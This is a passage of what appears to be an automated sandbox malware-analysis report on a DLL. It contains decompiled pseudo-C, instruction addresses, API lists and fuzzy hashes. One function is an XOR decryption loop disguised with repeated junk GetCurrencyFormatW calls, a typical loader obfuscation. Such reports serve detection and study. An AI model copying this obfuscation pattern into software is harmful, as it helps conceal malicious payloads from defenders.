									asm("sbb ecx, ecx");
									 *_t244 =  ~( *_t244) & 0x0000ffff;
									 *_t299 = _t244;
									_t245 = E1001CA7C(_t300 - 0x34, _t244, _t244, 0);
									 *(_t300 - 4) = 3;
									E1001CE9E(_t258, _t300 - 0x68, _t300,  *((intOrPtr*)(_t300 - 0x60)), _t245);
									__eflags =  *(_t300 - 0x2c);
									 *(_t300 - 4) = 1;
									if(__eflags != 0) {
										_push( *((intOrPtr*)(_t300 - 0x34)));
										E10004D75(_t258, _t293, _t299, __eflags);
									}
									goto L35;
								case 2:
									goto L35;
							}
						} else {
							if(_t313 == 0) {
								L34:
								 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
								_t258 = _t258 + _t293;
								__eflags = _t258;
								 *_t299 =  *_t258;
								goto L35;
							}
							_t250 = _t241;
							if(_t250 > 0x13) {
								goto L35;
							}
							switch( *((intOrPtr*)(_t250 * 4 +  &M1001E058))) {
								case 0:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__ax =  *__ebx;
									goto L28;
								case 1:
									goto L34;
								case 2:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
									__eax =  *(__ebp + 0x1c);
									__ebx =  &(__ebx[2]);
									 *__esi =  *( *(__ebp + 0x1c));
									goto L35;
								case 3:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
									__eax =  *(__ebp + 0x1c);
									__ebx =  &(__ebx[2]);
									 *__esi =  *( *(__ebp + 0x1c));
									goto L35;
								case 4:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__eax =  *__ebx;
									goto L17;
								case 5:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__eax =  *__ebx;
									_push(__eax);
									 *(__ebp - 0x1c) = __eax;
									__imp__#2();
									__eflags =  *(__ebp - 0x1c);
									 *__esi = __eax;
									if(__eflags == 0) {
										goto L35;
									}
									__eflags = __eax;
									if(__eflags != 0) {
										goto L35;
									}
									goto L23;
								case 6:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									 *__ebx =  ~( *__ebx);
									asm("sbb eax, eax");
									L28:
									 *__esi = __ax;
									goto L35;
								case 7:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 4;
									__edi =  *(__ebp - 0x10);
									__ebx =  &(__ebx[1]);
									__esi =  *__ebx;
									asm("movsd");
									asm("movsd");
									asm("movsd");
									asm("movsd");
									__esi =  *(__ebp - 0x1c);
									_push(4);
									_pop(__edi);
									goto L35;
								case 8:
									L24:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__eax =  *__ebx;
									_push(__eax);
									__ecx = __ebp - 0x18;
									 *(__ebp - 0x1c) = __eax;
									__eax = E1000567F(__ebx, __ecx, __edi, __esi, __eflags);
									_push( *(__ebp - 0x18));
									 *((char*)(__ebp - 4)) = 2;
									__imp__#2();
									__eflags =  *(__ebp - 0x1c);
									 *__esi = __eax;
									if( *(__ebp - 0x1c) == 0) {
										L26:
										__ecx =  *(__ebp - 0x18);
										__eax =  *(__ebp - 0x10);
										__ecx =  *(__ebp - 0x18) + 0xfffffff0;
										 *( *(__ebp - 0x10)) = 8;
										 *((char*)(__ebp - 4)) = 1;
										__eax = E10001260(__ecx, __edx);
										goto L35;
									}
									__eflags = __eax;
									if(__eflags == 0) {
										L23:
										__eax = E10004E3A(__ebx, __ecx, __edi, __esi, __eflags);
										goto L24;
									}
									goto L26;
								case 9:
									goto L35;
								case 0xa:
									 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
									_t258 = _t258 + _t293;
									 *_t299 =  *_t258;
									goto L35;
								case 0xb:
									__eax =  *(__ebp + 0x1c);
									__eax =  *(__ebp + 0x1c) + 8;
									 *(__ebp + 0x1c) = __eax;
									__ebx =  &(__ebx[2]);
									__eflags = __ebx;
									L17:
									__ecx =  *__eax;
									 *__esi = __ecx;
									 *(__esi + 4) = __eax;
									goto L35;
							}
						}
						L35:
						 *(_t300 - 0x10) =  *(_t300 - 0x10) - 0x10;
						_t299 = _t299 - 0x10;
						 *(_t300 - 0x14) =  &(( *(_t300 - 0x14))[1]);
						 *(_t300 - 0x1c) = _t299;
					} while ( *( *(_t300 - 0x14)) != 0);
					_t257 = 0;
					goto L37;
				}
			}

0x1001db64
0x1001db6b
0x1001db70
0x1001db73
0x1001db77
0x1001e050
0x1001e055
0x1001e055
0x1001db7d
0x1001db80
0x1001db83
0x1001db86
0x1001db90
0x1001db93
0x1001db98
0x1001db9e
0x1001dba9
0x1001dba9
0x1001dbb0
0x1001dbb7
0x1001dbbc
0x1001dbc3
0x1001dbc3
0x1001dbc6
0x1001dbcd
0x1001dbd0
0x1001dbd3
0x1001dbd6
0x1001dbd9
0x1001dbdc
0x1001dbe0
0x1001dbe4
0x1001dbe5
0x1001de05
0x1001de09
0x1001de0b
0x1001de14
0x1001de16
0x1001de16
0x1001de23
0x1001de2b
0x1001de2d
0x1001de59
0x1001de5c
0x1001de61
0x1001de66
0x1001de91
0x1001de91
0x1001de94
0x1001de9d
0x1001dea0
0x1001df75
0x1001df75
0x1001df7b
0x1001e032
0x1001e035
0x1001e039
0x1001e03e
0x1001e042
0x1001e045
0x1001e047
0x1001e04a
0x1001e04f
0x00000000
0x1001e045
0x1001df85
0x1001dfaa
0x1001dfad
0x1001dfb0
0x1001dfb3
0x00000000
0x00000000
0x1001dfb5
0x00000000
0x1001dfc6
0x1001dfcd
0x00000000
0x00000000
0x1001e02a
0x1001e02d
0x1001e030
0x00000000
0x00000000
0x1001dfe5
0x1001dfe8
0x00000000
0x00000000
0x1001dfef
0x1001dff2
0x00000000
0x00000000
0x1001dfd2
0x1001dfd5
0x1001dfd8
0x1001dfda
0x1001dfdd
0x00000000
0x00000000
0x1001dffc
0x1001e001
0x1001e004
0x00000000
0x00000000
0x1001e00c
0x1001e00f
0x1001e011
0x1001e015
0x1001e018
0x00000000
0x00000000
0x1001e01c
0x1001e01f
0x1001e022
0x1001e023
0x1001e024
0x1001e025
0x1001e026
0x00000000
0x00000000
0x00000000
0x00000000
0x1001dfc2
0x00000000
0x00000000
0x1001dfb5
0x1001df89
0x1001df8e
0x1001df94
0x1001df96
0x1001df98
0x00000000
0x00000000
0x1001df9e
0x1001dfa4
0x1001debc
0x1001debc
0x1001dec1
0x1001dec1
0x1001dec4
0x1001decd
0x1001decd
0x1001ded2
0x1001ded8
0x1001dedb
0x1001dedd
0x1001dee1
0x1001dee3
0x1001deeb
0x1001deec
0x1001def2
0x1001def2
0x1001def4
0x1001defa
0x1001df00
0x1001df08
0x1001df10
0x1001df13
0x1001df13
0x1001df1e
0x1001df24
0x1001df26
0x1001df2d
0x1001df32
0x1001df35
0x1001df35
0x1001df3d
0x1001df3f
0x1001df46
0x1001df4b
0x1001df4e
0x1001df4e
0x1001df56
0x1001df5b
0x1001df61
0x1001df6d
0x1001df70
0x00000000
0x1001df70
0x1001deaa
0x1001deb0
0x1001deb7
0x00000000
0x00000000
0x1001deb9
0x00000000
0x1001de68
0x1001de6b
0x1001de71
0x1001de8c
0x1001de8c
0x1001de8f
0x00000000
0x00000000
0x1001de77
0x1001de79
0x1001de7b
0x1001de81
0x1001de82
0x1001de88
0x1001de88
0x1001de8b
0x1001de8b
0x00000000
0x1001de8b
0x1001de7d
0x1001de7f
0x00000000
0x00000000
0x00000000
0x1001de7f
0x00000000
0x1001de8c
0x1001dbeb
0x1001dbef
0x1001dbff
0x1001dc0a
0x1001dc0d
0x1001dc15
0x1001dc18
0x1001dc1b
0x1001dc21
0x1001dc21
0x1001dc25
0x1001dc28
0x1001dc2b
0x00000000
0x00000000
0x1001dc31
0x1001dc36
0x1001dc39
0x1001dc3f
0x1001dc42
0x1001dc45
0x1001dc48
0x1001dc4e
0x1001dc51
0x1001dc54
0x1001dc5e
0x1001dc5e
0x1001dc61
0x1001dc69
0x1001dc6b
0x1001dd88
0x1001dd8d
0x1001dd90
0x00000000
0x00000000
0x1001dd92
0x00000000
0x00000000
0x00000000
0x1001dd99
0x1001dd9c
0x1001dd9e
0x1001dda4
0x1001ddae
0x1001ddb5
0x1001ddb7
0x1001ddc3
0x1001ddc7
0x1001ddcc
0x1001ddd0
0x1001ddd4
0x1001ddd6
0x1001ddd9
0x1001ddde
0x00000000
0x00000000
0x00000000
0x00000000
0x1001dc71
0x1001dc71
0x1001dde1
0x1001dde1
0x1001dde4
0x1001dde4
0x1001dde8
0x00000000
0x1001dde8
0x1001dc78
0x1001dc7c
0x00000000
0x00000000
0x1001dc82
0x00000000
0x1001dc97
0x1001dc9a
0x1001dc9c
0x00000000
0x00000000
0x00000000
0x00000000
0x1001dcbf
0x1001dcc3
0x1001dcc8
0x1001dccb
0x00000000
0x00000000
0x1001dcd2
0x1001dcd6
0x1001dcdb
0x1001dcde
0x00000000
0x00000000
0x1001dce5
0x1001dce8
0x1001dcea
0x00000000
0x00000000
0x1001dcee
0x1001dcf1
0x1001dcf3
0x1001dcf5
0x1001dcf6
0x1001dcf9
0x1001dcff
0x1001dd03
0x1001dd05
0x00000000
0x00000000
0x1001dd0b
0x1001dd0d
0x00000000
0x00000000
0x00000000
0x00000000
0x1001dd60
0x1001dd63
0x1001dd67
0x1001dd69
0x1001dd6b
0x1001dd6b
0x00000000
0x00000000
0x1001dd70
0x1001dd74
0x1001dd77
0x1001dd7a
0x1001dd7c
0x1001dd7d
0x1001dd7e
0x1001dd7f
0x1001dd80
0x1001dd83
0x1001dd85
0x00000000
0x00000000
0x1001dd18
0x1001dd18
0x1001dd1b
0x1001dd1d
0x1001dd1f
0x1001dd20
0x1001dd23
0x1001dd26
0x1001dd2b
0x1001dd2e
0x1001dd32
0x1001dd38
0x1001dd3c
0x1001dd3e
0x1001dd44
0x1001dd44
0x1001dd47
0x1001dd4a
0x1001dd4d
0x1001dd52
0x1001dd56
0x00000000
0x1001dd56
0x1001dd40
0x1001dd42
0x1001dd13
0x1001dd13
0x00000000
0x1001dd13
0x00000000
0x00000000
0x00000000
0x00000000
0x1001dc89
0x1001dc8c
0x1001dc90
0x00000000
0x00000000
0x1001dca4
0x1001dca7
0x1001dcaa
0x1001dcad
0x1001dcad
0x1001dcb0
0x1001dcb0
0x1001dcb2
0x1001dcb7
0x00000000
0x00000000
0x1001dc82
0x1001ddea
0x1001ddea
0x1001ddee
0x1001ddf1
0x1001ddfa
0x1001ddfa
0x1001de03
0x00000000
0x1001de03

APIs

__EH_prolog3.LIBCMT ref: 1001DB6B
_memset.LIBCMT ref: 1001DB93
lstrlenA.KERNEL32(?), ref: 1001DBA3
_memset.LIBCMT ref: 1001DC0D
_memset.LIBCMT ref: 1001DE23
VariantClear.OLEAUT32(?), ref: 1001DE82
VariantClear.OLEAUT32(?), ref: 1001DEAA
SysStringLen.OLEAUT32(?), ref: 1001DF04
SysFreeString.OLEAUT32(?), ref: 1001DF24
SysStringLen.OLEAUT32(?), ref: 1001DF29
SysFreeString.OLEAUT32(?), ref: 1001DF3D
SysStringLen.OLEAUT32(?), ref: 1001DF42
SysFreeString.OLEAUT32(?), ref: 1001DF56
__CxxThrowException@8.LIBCMT ref: 1001DF70
VariantChangeType.OLEAUT32(?,?,00000000,?), ref: 1001DF8E
VariantClear.OLEAUT32(?), ref: 1001DF9E

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: String$Variant$ClearFree_memset$ChangeException@8H_prolog3ThrowTypelstrlen
String ID:
API String ID: 4128688680-0
Opcode ID: 61c2a484d30def1def3ecb87556bc7cbebaab813836ef0d38b14f81032296a9f
Instruction ID: d0b60735e7dfbc48b8ffc6b3fb26c55a134f5783589098a9cdb935b98e8b1adc
Opcode Fuzzy Hash: 61c2a484d30def1def3ecb87556bc7cbebaab813836ef0d38b14f81032296a9f
Instruction Fuzzy Hash: 77F1797090024ADFDF11EFA8D880AAEBBB5FF09340F11806AE851AB261D774DE95CF51

Uniqueness

Uniqueness Score: -1.00%

Function 100083A5 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 77
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E100083A5() {
				void* __ebx;
				void* __esi;
				struct HINSTANCE__* _t5;
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t9;
				_Unknown_base(*)()* _t10;
				_Unknown_base(*)()* _t11;
				_Unknown_base(*)()* _t12;
				struct HINSTANCE__* _t18;
				void* _t20;
				intOrPtr _t23;
				_Unknown_base(*)()* _t24;

				_t23 =  *0x100482fc; // 0x0
				if(_t23 == 0) {
					_push(_t20);
					 *0x10048300 = E1000834D(0, _t20, __eflags);
					_t18 = GetModuleHandleA("USER32");
					__eflags = _t18;
					if(_t18 == 0) {
						L12:
						 *0x100482e0 = 0;
						 *0x100482e4 = 0;
						 *0x100482e8 = 0;
						 *0x100482ec = 0;
						 *0x100482f0 = 0;
						 *0x100482f4 = 0;
						 *0x100482f8 = 0;
						_t5 = 0;
					} else {
						_t6 = GetProcAddress(_t18, "GetSystemMetrics");
						__eflags = _t6;
						 *0x100482e0 = _t6;
						if(_t6 == 0) {
							goto L12;
						} else {
							_t7 = GetProcAddress(_t18, "MonitorFromWindow");
							__eflags = _t7;
							 *0x100482e4 = _t7;
							if(_t7 == 0) {
								goto L12;
							} else {
								_t8 = GetProcAddress(_t18, "MonitorFromRect");
								__eflags = _t8;
								 *0x100482e8 = _t8;
								if(_t8 == 0) {
									goto L12;
								} else {
									_t9 = GetProcAddress(_t18, "MonitorFromPoint");
									__eflags = _t9;
									 *0x100482ec = _t9;
									if(_t9 == 0) {
										goto L12;
									} else {
										_t10 = GetProcAddress(_t18, "EnumDisplayMonitors");
										__eflags = _t10;
										 *0x100482f4 = _t10;
										if(_t10 == 0) {
											goto L12;
										} else {
											_t11 = GetProcAddress(_t18, "GetMonitorInfoA");
											__eflags = _t11;
											 *0x100482f0 = _t11;
											if(_t11 == 0) {
												goto L12;
											} else {
												_t12 = GetProcAddress(_t18, "EnumDisplayDevicesA");
												__eflags = _t12;
												 *0x100482f8 = _t12;
												if(_t12 == 0) {
													goto L12;
												} else {
													_t5 = 1;
													__eflags = 1;
												}
											}
										}
									}
								}
							}
						}
					}
					 *0x100482fc = 1;
					return _t5;
				} else {
					_t24 =  *0x100482f0; // 0x0
					return 0 | _t24 != 0x00000000;
				}
			}

0x100083a8
0x100083ae
0x100083bd
0x100083c9
0x100083d4
0x100083d6
0x100083d8
0x1000846c
0x1000846c
0x10008472
0x10008478
0x1000847e
0x10008484
0x1000848a
0x10008490
0x10008496
0x100083de
0x100083ea
0x100083ec
0x100083ee
0x100083f3
0x00000000
0x100083f5
0x100083fb
0x100083fd
0x100083ff
0x10008404
0x00000000
0x10008406
0x1000840c
0x1000840e
0x10008410
0x10008415
0x00000000
0x10008417
0x1000841d
0x1000841f
0x10008421
0x10008426
0x00000000
0x10008428
0x1000842e
0x10008430
0x10008432
0x10008437
0x00000000
0x10008439
0x1000843f
0x10008441
0x10008443
0x10008448
0x00000000
0x1000844a
0x10008450
0x10008452
0x10008454
0x10008459
0x00000000
0x1000845b
0x1000845d
0x1000845d
0x1000845d
0x10008459
0x10008448
0x10008437
0x10008426
0x10008415
0x10008404
0x100083f3
0x10008460
0x1000846b
0x100083b0
0x100083b2
0x100083bc
0x100083bc

APIs

GetModuleHandleA.KERNEL32(USER32,00000000,00000000,75BD5D80,100084F1,?,?,?,?,?,?,?,1000A3B2,00000000,00000002,00000028), ref: 100083CE
GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 100083EA
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 100083FB
GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 1000840C
GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 1000841D
GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 1000842E
GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 1000843F
GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA), ref: 10008450

Strings

EnumDisplayMonitors, xrefs: 10008428
USER32, xrefs: 100083C4
EnumDisplayDevicesA, xrefs: 1000844A
MonitorFromWindow, xrefs: 100083F5
GetSystemMetrics, xrefs: 100083E4
GetMonitorInfoA, xrefs: 10008439
MonitorFromRect, xrefs: 10008406
MonitorFromPoint, xrefs: 10008417

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
API String ID: 667068680-68207542
Opcode ID: e8b2e64e54b17024b951b3e1fbf6a3b50251443a1579d1f10a064b5ef0c7bf66
Instruction ID: 374b253654f9bab27aaa6d0bbf775ac5182f219bddcb8a0b2eb046c4e2c1642a
Opcode Fuzzy Hash: e8b2e64e54b17024b951b3e1fbf6a3b50251443a1579d1f10a064b5ef0c7bf66
Instruction Fuzzy Hash: B5214F70901D229FE352EF294FC086EBAF4F34B281751493ED248D6221D7744241EB5D

Uniqueness

Uniqueness Score: -1.00%

Function 10001B36 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 205
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 89%

			E10001B36(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int* _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v25;
				signed int _t85;
				signed int _t94;
				signed int _t128;
				intOrPtr _t149;
				short* _t151;
				short* _t182;

				_t84 = 0;
				_v20 = 0;
				_v16 = 0;
				_v12 = 0;
				if(_a24 > 0) {
					_v24 = _a4 - _a12 + _a8;
					_t151 = L"xadqsavcbdfewescGADW";
					_t182 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
					while(1) {
						_t85 = GetCurrencyFormatW(_t84, 0x11d4, _t182, _t84, _t151, 0x22b9);
						asm("cdq");
						_v20 = (_t85 * _v24 *  *0x100440dc + _v20 + 1) % 0x4708;
						_v20 = GetCurrencyFormatW(0, 0x11d4, _t182, 0, _t151, 0x22b9) * _v24 *  *0x100440e0 + _v20;
						_t94 = GetCurrencyFormatW(0, 0x11d4, _t182, 0, _t151, 0x22b9);
						asm("cdq");
						_v16 = (( *(_t94 * _v24 *  *0x100440d0 + _v20 + _a16) & 0x000000ff) + _v16) % 0x4708;
						_v16 = GetCurrencyFormatW(0, 0x11d4, _t182, 0, _t151, 0x22b9) * _v24 *  *0x100440e0 + _v16;
						_v25 =  *((intOrPtr*)(GetCurrencyFormatW(0, 0x11d4, _t182, 0, _t151, 0x22b9) * _v24 *  *0x100440d0 + _v20 + _a16));
						_v8 = GetCurrencyFormatW(0, 0x11d4, _t182, 0, _t151, 0x22b9) * _v24 *  *0x100440e0 + _v16 + _a16;
						 *((char*)(GetCurrencyFormatW(0, 0x11d4, _t182, 0, _t151, 0x22b9) * _v24 *  *0x100440e0 + _v20 + _a16)) =  *_v8;
						 *((char*)(GetCurrencyFormatW(0, 0x11d4, _t182, 0, _t151, 0x22b9) * _v24 *  *0x100440dc + _v16 + _a16)) = _v25;
						_v8 =  *(GetCurrencyFormatW(0, 0x11d4, _t182, 0, _t151, 0x22b9) * _v24 *  *0x100440cc + _v16 + _a16) & 0x000000ff;
						_t128 = GetCurrencyFormatW(0, 0x11d4, _t182, 0, _t151, 0x22b9);
						asm("cdq");
						_v8 = (( *(_t128 * _v24 *  *0x100440cc + _v20 + _a16) & 0x000000ff) + _v8) % 0x4708;
						_v8 = GetCurrencyFormatW(0, 0x11d4, _t182, 0, _t151, 0x22b9) * _v24 *  *0x100440d8 + _v8;
						_v4 = GetCurrencyFormatW(0, 0x11d4, _t182, 0, _t151, 0x22b9) * _v24 *  *0x100440dc + _v12 + _a20;
						 *_v4 =  *_v4 ^  *(GetCurrencyFormatW(0, 0x11d4, _t182, 0, _t151, 0x22b9) * _v24 *  *0x100440e0 + _v8 + _a16);
						_v12 = _v12 + 1;
						_t149 = _v12;
						if(_t149 >= _a24) {
							break;
						}
						_t84 = 0;
					}
					return _t149;
				}
				return 0;
			}

0x10001b39
0x10001b3f
0x10001b43
0x10001b47
0x10001b4b
0x10001b69
0x10001b6d
0x10001b72
0x10001b80
0x10001b8a
0x10001ba0
0x10001bb4
0x10001bd6
0x10001bda
0x10001bfd
0x10001c0c
0x10001c2e
0x10001c57
0x10001c77
0x10001ca9
0x10001cd2
0x10001cfb
0x10001cff
0x10001d22
0x10001d31
0x10001d53
0x10001d73
0x10001d9a
0x10001d9c
0x10001da0
0x10001da8
0x00000000
0x00000000
0x10001b7e
0x10001b7e
0x00000000
0x10001db1
0x10001db5

APIs

GetCurrencyFormatW.KERNEL32 ref: 10001B8A
GetCurrencyFormatW.KERNEL32 ref: 10001BB8
GetCurrencyFormatW.KERNEL32 ref: 10001BDA
GetCurrencyFormatW.KERNEL32 ref: 10001C10
GetCurrencyFormatW.KERNEL32 ref: 10001C32
GetCurrencyFormatW.KERNEL32 ref: 10001C5B
GetCurrencyFormatW.KERNEL32 ref: 10001C81
GetCurrencyFormatW.KERNEL32 ref: 10001CAC
GetCurrencyFormatW.KERNEL32 ref: 10001CD5
GetCurrencyFormatW.KERNEL32 ref: 10001CFF
GetCurrencyFormatW.KERNEL32 ref: 10001D35
GetCurrencyFormatW.KERNEL32 ref: 10001D57
GetCurrencyFormatW.KERNEL32 ref: 10001D7D

Strings

xadqsavcbdfewescGADW, xrefs: 10001B6D, 10001B85, 10001BAD, 10001BCF, 10001C05, 10001C27, 10001C50, 10001C76, 10001CA2, 10001CCB, 10001CF4, 10001D2A, 10001D4C, 10001D72
eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 10001B72, 10001B87, 10001BB0, 10001BD2, 10001C08, 10001C2A, 10001C53, 10001C7D, 10001CA5, 10001CCE, 10001CF7, 10001D2D, 10001D4F, 10001D79

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: CurrencyFormat
String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
API String ID: 3383288267-3161301136
Opcode ID: 69c51003af96275454d602057090bf2f3f4a2519da6507d6aeea24ce666c7f9e
Instruction ID: 0456d89d922e5c10c0a98bb53afe019d0a386320811ad7c1ac40a02f71bd5ba4
Opcode Fuzzy Hash: 69c51003af96275454d602057090bf2f3f4a2519da6507d6aeea24ce666c7f9e
Instruction Fuzzy Hash: 71710875548355AFE304DF51CE82F1BBBE8EBCAB44F01580EF6809B2A1C670E9148F66

Uniqueness

Uniqueness Score: -1.00%

Function 1001AEE4 Relevance: 26.0, APIs: 17, Instructions: 452
windowkeyboardCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E1001AEE4(void* __ebx, signed int __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4, struct tagMSG* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v24;
				int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				struct HWND__* _v52;
				signed int _t139;
				signed int _t141;
				void* _t142;
				signed int _t146;
				signed int _t149;
				intOrPtr _t150;
				signed int _t152;
				signed char _t153;
				signed int _t154;
				signed int _t155;
				int _t156;
				signed int _t161;
				signed int _t165;
				void* _t167;
				signed char _t171;
				signed int _t172;
				signed int _t173;
				signed int _t174;
				signed char _t182;
				intOrPtr _t183;
				signed int _t184;
				short _t188;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t195;
				signed int _t198;
				signed char _t199;
				signed int _t200;
				signed int _t201;
				short _t204;
				signed int _t206;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				void* _t211;
				signed int _t215;
				signed int _t216;
				struct HWND__* _t217;
				struct tagMSG* _t221;
				intOrPtr _t224;
				void* _t231;
				void* _t234;
				struct tagMSG* _t240;
				signed int _t242;
				int _t243;
				signed int _t244;
				long _t247;
				intOrPtr _t249;
				signed int _t251;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				signed int _t258;
				void* _t260;
				void* _t262;

				_t232 = __ecx;
				_t260 = _t262;
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t139 = E1001AD41(_a4, _a8);
				_t238 = _t139;
				if(_t139 == 0) {
					_t232 = _a4;
					_t231 = E10009228(_a4);
					if(_t231 != 0) {
						_t221 =  *((intOrPtr*)(_t231 + 0x44));
						_a8 = _t221;
						if(_t221 != 0) {
							while(1) {
								_t9 = _t231 + 0x40; // 0x40
								_t232 = _t9;
								_t258 =  *(E1000911A( &_a8));
								_t224 =  *((intOrPtr*)(_t258 + 4));
								if(_t224 != 0 && _t224 ==  *((intOrPtr*)(_t231 + 0x70))) {
									break;
								}
								if( *_t258 == 0 ||  *_t258 != GetFocus()) {
									if(_a8 != 0) {
										continue;
									} else {
									}
								} else {
									break;
								}
								goto L10;
							}
							_t238 = _t258;
						}
					}
				}
				L10:
				_t247 = 0;
				while(1) {
					_t238 = E1001AD93(_t232, _a4, _t238, _a12);
					if(_t238 == 0) {
						break;
					}
					_t142 = E1001A83E(_t238);
					_pop(_t232);
					if(_t142 == 0) {
						L14:
						if(_t238 == 0) {
							L21:
							__eflags =  *(_t238 + 4);
							if(__eflags == 0) {
								E10004E6E(0, _t232, _t238, _t247, __eflags);
								asm("int3");
								_push(0x28);
								E1001FBF7(E10034708, 0, _t238, _t247);
								_t146 = _a4;
								__eflags = _t146;
								if(_t146 != 0) {
									_v48 =  *((intOrPtr*)(_t146 + 0x20));
								} else {
									_v48 = _v48 & _t146;
								}
								_t240 = _a8;
								_t249 = _t240->message;
								_v32 = _t249;
								_v52 = GetFocus();
								_t149 = E1000A8F0(0, _t232, _t260, _t148);
								_t229 = 0x100;
								__eflags = _t249 - 0x100;
								_v24 = _t149;
								if(_t249 < 0x100) {
									L34:
									__eflags = _t249 + 0xfffffe00 - 9;
									if(_t249 + 0xfffffe00 > 9) {
										goto L56;
									} else {
										goto L35;
									}
								} else {
									__eflags = _t249 - 0x109;
									if(_t249 <= 0x109) {
										L35:
